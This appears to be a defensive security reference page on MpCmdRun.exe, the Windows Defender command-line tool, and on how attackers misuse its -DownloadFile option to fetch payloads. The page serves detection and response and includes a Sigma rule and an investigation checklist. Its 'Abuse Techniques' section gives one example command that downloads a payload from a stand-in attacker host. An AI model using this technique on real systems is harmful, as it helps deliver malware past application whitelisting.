anavem.
High RiskWindowsLegitimateCommonly Abused
MpCmdRun.exeSECURITY TOOL

MpCmdRun.exe - Windows Defender CLI Security Analysis

MpCmdRun.exe is the **Windows Defender command-line interface**. While legitimate for scanning and management, attackers abuse it as a **LOLBin to download files** using the -DownloadFile parameter. This trusted Microsoft binary can bypass security controls while fetching malicious payloads.

Risk Summary

HIGH priority for SOC triage. MpCmdRun.exe is a legitimate Defender tool that can be abused to download files. The -DownloadFile parameter enables fetching arbitrary files from URLs. Monitor for this parameter and unusual download destinations.

Overview

What is MpCmdRun.exe?

MpCmdRun.exe is the Windows Defender command-line utility.

Legitimate Functions

Defender Operations:

  • Run scans (Quick, Full, Custom)
  • Update definitions
  • Manage threats
  • Check status

LOLBin Capability

-DownloadFile Parameter:

  • Download files from URLs
  • Bypass security controls
  • Microsoft signed binary

Normal Behavior

Normal Behavior

Expected Process State

PropertyExpected Value
PathC:\ProgramData\Microsoft\Windows Defender\Platform*\MpCmdRun.exe
Parentcmd.exe, powershell.exe (admin)
UserAdministrator or SYSTEM
ContextDefender management

Legitimate Commands

MpCmdRun.exe -Scan -ScanType 1
MpCmdRun.exe -SignatureUpdate
MpCmdRun.exe -Restore -ListAll

Common Locations

C:\ProgramData\Microsoft\Windows Defender\Platform\*\MpCmdRun.exeC:\Program Files\Windows Defender\MpCmdRun.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE

Command:     MpCmdRun.exe -Scan -ScanType 1
             MpCmdRun.exe -SignatureUpdate
Context:     Defender management

SUSPICIOUS

Command:     MpCmdRun.exe -DownloadFile -url http://... -path C:\...
Context:     File download
             Non-IT user

Dangerous Parameters

ParameterRiskDescription
-DownloadFileCRITICALDownload from URL
-urlCRITICALSource URL
-pathHIGHDestination path

Abuse Techniques

Attack Techniques

Technique #1: LOLBin File Download (T1105)

Download Malware via Defender:

MpCmdRun.exe -DownloadFile -url "http://attacker.com/payload.exe" -path "C:\Users\Public\payload.exe"

Why It Works:

  • Microsoft signed binary
  • Trusted security tool
  • Bypasses application whitelisting
  • May bypass network monitoring

Detection Guidance

Detection Strategies

Priority #1: Download Parameter Detection

Sigma Rule:

title: MpCmdRun.exe Download
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\MpCmdRun.exe'
    CommandLine|contains: '-DownloadFile'
  condition: selection
level: critical

Priority #2: URL Parameter

Process = "MpCmdRun.exe" AND
CommandLine CONTAINS "-url"
→ ALERT: CRITICAL - File download attempt

Remediation Steps

Protection and Remediation

Defense: Command Line Monitoring

Alert on MpCmdRun.exe with -DownloadFile.

If Compromise Suspected

  1. Identify downloaded file path
  2. Analyze downloaded content
  3. Check if file was executed
  4. Hunt for related activity

Investigation Checklist

Investigation Checklist

  • Review full command line
  • Check for -DownloadFile parameter
  • Identify source URL
  • Locate downloaded file
  • Analyze file content
  • Check for subsequent execution

MITRE ATT&CK Techniques

T1105T1218

Related Windows Files

EXCEL.EXEhigh

EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vecto...

Commonly Abused
expressvpn.exemedium

ExpressVPN is a commercial VPN service client. While legitimate for privacy, it can be abused for C2...

MsMpEng.execritical

MsMpEng.exe is the **Windows Defender Antimalware Service Executable**, the core engine of Windows S...

Commonly Abused
nordvpn.exemedium

NordVPN is a commercial VPN client offering encrypted tunneling. Can be abused for evading network c...

Last verified: January 18, 2026